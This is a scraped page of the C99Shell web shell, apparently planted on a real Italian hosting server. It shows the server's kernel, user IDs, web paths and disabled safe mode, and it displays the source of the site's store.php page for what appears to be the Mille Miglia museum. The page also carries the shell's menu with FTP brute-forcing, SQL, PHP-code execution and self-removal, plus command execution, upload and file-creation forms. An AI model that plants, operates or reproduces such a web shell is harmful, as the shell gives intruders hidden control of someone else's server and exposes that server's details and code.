!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/en/   drwxr-xr-x
Free 184.31 GB of 490.84 GB (37.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     store.php (4.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include('include_dir.php');
include(
$percorsoLingua.'include/include.php');

$grafica=new Tgrafica(false,false);
$grafica->titolo='';
$grafica->keywords='';
$grafica->description='';
$grafica->codicePagina=costantiP::CP_STORE;
$grafica->codiceBody='page1';

$pagina = isset($_GET['pagina'])?$_GET['pagina']:1;

$grafica->paint();
unset(
$grafica);

function 
corpo_pagina()
{
    
?>
        <section id="slider" class="slider-parallax" style="background-color: #222;">

            <div id="oc-slider" class="owl-carousel carousel-widget" data-margin="0" data-items="1" data-pagi="false" data-loop="true" data-animate-in="fadeIn" data-speed="450" data-animate-out="fadeOut" data-autoplay="5000">
                
                <!--
                <a href="#"><img src="../images/slider/store_01.jpg" alt="Slider"></a>
                <a href="#"><img src="../images/slider/store_02.jpg" alt="Slider"></a>
                <a href="#"><img src="../images/slider/store_03.jpg" alt="Slider"></a>
                <a href="#"><img src="../images/slider/store_04.jpg" alt="Slider"></a>
                -->
                <a href="#"><img src="../images/slider/slide_2020_1.jpg" alt="Slider"></a>
                <a href="#"><img src="../images/slider/slide_2020_5.jpg" alt="Slider"></a>
                <a href="#"><img src="../images/slider/slide_2020_6.jpg" alt="Slider"></a>

            </div>

        </section>
        
        <!-- Content
        ============================================= -->
        <section id="content">
            <div class="content-wrap">

                <div class="container clearfix bottommargin-sm">
                    <div class="row clearfix">
        
                        <div class="col-md-6">
                            <div class="heading-block">
                                <h3><?echo traduci('','STORE')?></h3>
                            </div>
                            <p><?echo traduci('','TESTO_STORE')?></p>
                            
                            <!--<p style="color: #e10f21; font-size: 20px;"><strong>Extraordinary closure on June, 13 2023 on the occasion of the start of the Mille Miglia 2023.</strong></p>-->
                            
                            <p class="center"><a href="mailto:<?= costantiP::EMAIL_SHOP?>" class="button noleftmargin norightmargin"><?echo traduci('','RICHIEDI_INFO')?></a></p>
                                
                            
                        </div>

                        <div class="col-md-6">
                            <!-- Portfolio Single Gallery Thumbs
                            ============================================= -->
                            <div class="col_full portfolio-single-image masonry-thumbs col-2" data-lightbox="gallery">
                                <a href="../images/store/store_01.jpg" data-lightbox="gallery-item"><img class="image_fade" src="../images/store/store_01.jpg" alt="Museo Mille Miglia"></a>
                                <a href="../images/store/store_02.jpg" data-lightbox="gallery-item"><img class="image_fade" src="../images/store/store_02.jpg" alt="Museo Mille Miglia"></a>
                                <a href="../images/store/store_03.jpg" data-lightbox="gallery-item"><img class="image_fade" src="../images/store/store_03.jpg" alt="Museo Mille Miglia"></a>
                                <a href="../images/store/store_04.jpg" data-lightbox="gallery-item"><img class="image_fade" src="../images/store/store_04.jpg" alt="Museo Mille Miglia"></a>
                                <a href="../images/store/store_06.jpg" data-lightbox="gallery-item"><img class="image_fade" src="../images/store/store_06.jpg" alt="Museo Mille Miglia"></a>
                                <a href="../images/store/store_07.jpg" data-lightbox="gallery-item"><img class="image_fade" src="../images/store/store_07.jpg" alt="Museo Mille Miglia"></a>
                            </div><!-- .portfolio-single-image end -->
                        </div>
                        
                    </div>
                </div>
                
                <div class="container clearfix">
                    <div class="row">
                        <div class="col-md-6 col-sm-12 topmargin-sm">
                            <a href="<?=costantiP::BASE_URL.costantiP::LINGUA?>/gallery.php">
                                <div class="feature-box fbox-plain center promo promo-mini" style="background: url('../images/bg_gallery.jpg') center center no-repeat; background-size: cover;">
                                    <h3 class="nobottommargin" style="color: #FFF;"><?echo traduci('','VAI_ALLA_GALLERY')?></h3>
                                    <p class="nomargin" style="color: #FFF;"><?echo traduci('','GUARDA_IMMAGINI')?></p>
                                </div>
                            </a>
                        </div>
                        <div class="col-md-6 col-sm-12 topmargin-sm">
                            <a href="<?=costantiP::BASE_URL.costantiP::LINGUA?>/newseventi.php">
                                <div class="feature-box fbox-plain center promo promo-mini" style="background-color: #cccccc;">
                                    <div class="pbox-icon"><img src="../images/icon/icon-news.png"></div>
                                    <h3 class="nobottommargin"><?echo traduci('','NEWS_ED_EVENTI')?></h3>
                                    <p class="nomargin" style="color: #FFF;"><?echo traduci('','LEGGI_IL_BLOG')?></p>
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
                
            </div> <!--content-wrap end-->
        </section> <!--content end-->

    <?
}

function 
HeaderAggiuntivi()
{
    
?>
   
  
    <?
    
}
        
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0072 ]--